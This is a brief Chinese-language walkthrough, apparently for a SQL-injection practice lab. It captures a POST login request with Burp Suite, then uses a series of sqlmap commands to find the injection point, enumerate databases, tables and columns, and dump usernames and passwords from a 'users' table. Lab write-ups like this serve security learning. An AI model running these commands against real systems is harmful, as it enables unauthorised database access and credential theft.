1.由于该题是post注入,所以我们在用户名密码处随意输入并使用bp进行抓包存储文件。
2.查询注入点
sqlmap.py -r 1.txt
3.查询数据库
sqlmap.py -r 1.txt –dbs
4.查询表
sqlmap.py -r 1.txt -D security –tables
5.查询列
sqlmap.py -r 1.txt -D security -T users –columns
6.查询字段中得值
sqlmap.py -r 1.txt -D security -T users -C username,password –dump